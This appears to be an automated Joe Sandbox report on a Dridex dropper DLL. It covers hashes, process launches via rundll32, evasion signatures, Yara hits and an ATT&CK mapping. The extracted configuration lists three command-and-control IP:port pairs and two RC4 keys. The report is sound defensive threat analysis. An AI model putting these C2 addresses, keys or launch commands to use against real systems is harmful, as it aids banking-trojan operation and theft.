Play interactive tour

Edit tour

Analysis Report RuRxpMUPN7

Overview

General Information

Sample Name:	RuRxpMUPN7 (renamed file extension from none to dll)
Analysis ID:	392882
MD5:	f6a73ad1c962b6d3d979066d37da71b5
SHA1:	c19b72b1b07a8065f2a62be97cb1cccfb1d5b93f
SHA256:	8d357ea7f4cbfcbbd9af86a34c421b7011204c83efa788b2527a79f9c464f287
Tags:	40111Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 1416 cmdline: loaddll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 4512 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4356 cmdline: rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6692 cmdline: rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 440 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000008.00000002.511726396.0000000072AD1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.rundll32.exe.72ad0000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
8.2.rundll32.exe.72ad0000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.rundll32.exe.72ad0000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Machine Learning detection for sample

Show sources

Source: RuRxpMUPN7.dll

Joe Sandbox ML: detected

Source: 3.2.rundll32.exe.2fa0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 8.2.rundll32.exe.2b90000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 1.2.loaddll32.exe.640000.1.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: RuRxpMUPN7.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: RuRxpMUPN7.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: opengl32.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.339834810.00000000008B3000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000003.00000003.331405195.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.406325341.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000003.00000003.331405195.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.406325341.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.339825322.00000000008AD000.00000004.00000001.sdmp
Source:	Binary string: opengl32.pdbj source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp, RuRxpMUPN7.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.350581972.0000000004B00000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.339850217.00000000008B9000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdbT source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.350581972.0000000004B00000.00000004.00000040.sdmp
Source:	Binary string: azojr}oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000B.00000002.372783936.0000000000332000.00000004.00000010.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.339834810.00000000008B3000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.350581972.0000000004B00000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.339825322.00000000008AD000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 94.247.168.64:443
Source: Malware configuration extractor	IPs: 159.203.93.122:8172
Source: Malware configuration extractor	IPs: 50.116.27.97:2303

Source: Joe Sandbox View	IP Address: 159.203.93.122 159.203.93.122
Source: Joe Sandbox View	IP Address: 50.116.27.97 50.116.27.97

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

Source: RuRxpMUPN7.dll

String found in binary or memory: http://ansicon.adoxa.vze.com/6

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.511726396.0000000072AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.72ad0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.72ad0000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72AE2790 NtAllocateVirtualMemory,	3_2_72AE2790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72AE218C NtDelayExecution,	3_2_72AE218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72ADBC00 NtClose,	3_2_72ADBC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72AE07CC	3_2_72AE07CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72AD1494	3_2_72AD1494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72AE92DC	3_2_72AE92DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72AD84E4	3_2_72AD84E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72AE14D8	3_2_72AE14D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72ADA5A4	3_2_72ADA5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_72AD9144	3_2_72AD9144

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 440

Source: RuRxpMUPN7.dll

Binary or memory string: OriginalFilenameANSI32.dll0 vs RuRxpMUPN7.dll

Source: RuRxpMUPN7.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: RuRxpMUPN7.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal80.bank.troj.evad.winDLL@8/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1416

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B47.tmp

Jump to behavior

Source: RuRxpMUPN7.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',ReadLogRecord
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 440
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',ReadLogRecord	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1	Jump to behavior

Source: RuRxpMUPN7.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: RuRxpMUPN7.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: opengl32.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.339834810.00000000008B3000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000003.00000003.331405195.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.406325341.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000003.00000003.331405195.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.406325341.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.339825322.00000000008AD000.00000004.00000001.sdmp
Source:	Binary string: opengl32.pdbj source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp, RuRxpMUPN7.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.350581972.0000000004B00000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.350557586.0000000004B02000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.339850217.00000000008B9000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdbT source: WerFault.exe, 0000000B.00000003.350591843.0000000004B08000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.350581972.0000000004B00000.00000004.00000040.sdmp
Source:	Binary string: azojr}oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000B.00000002.372783936.0000000000332000.00000004.00000010.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.339834810.00000000008B3000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.350553195.0000000004B31000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.350581972.0000000004B00000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.339825322.00000000008AD000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_72ADF744 push esi; mov dword ptr [esp], 00000000h

3_2_72ADF745

Source: initial sample

Static PE information: section name: .text entropy: 7.55877156847

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 708

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 459

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_72AE07CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

3_2_72AE07CC

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WerFault.exe, 0000000B.00000002.373860434.00000000047F0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000000B.00000002.373860434.00000000047F0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000000B.00000002.373860434.00000000047F0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000000B.00000002.373860434.00000000047F0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_72AD6DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_72AD6DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_72AE3060 RtlAddVectoredExceptionHandler,

3_2_72AE3060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1

Jump to behavior

Source: rundll32.exe, 00000003.00000002.511797018.0000000003620000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.509492989.0000000003080000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: rundll32.exe, 00000003.00000002.511797018.0000000003620000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.509492989.0000000003080000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.511797018.0000000003620000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.509492989.0000000003080000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.511797018.0000000003620000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.509492989.0000000003080000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_72AD6DC8

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_72AD6DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	OS Credential Dumping	Security Software Discovery111	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RuRxpMUPN7.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.2fa0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
8.2.rundll32.exe.2b90000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
1.2.loaddll32.exe.640000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ansicon.adoxa.vze.com/6	RuRxpMUPN7.dll	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
159.203.93.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.27.97	unknown	United States	63949	LINODE-APLinodeLLCUS	true
94.247.168.64	unknown	Sweden	43948	GLESYS-ASSE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	392882
Start date:	19.04.2021
Start time:	23:35:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	RuRxpMUPN7 (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.evad.winDLL@8/4@0/3
EGA Information:	Failed
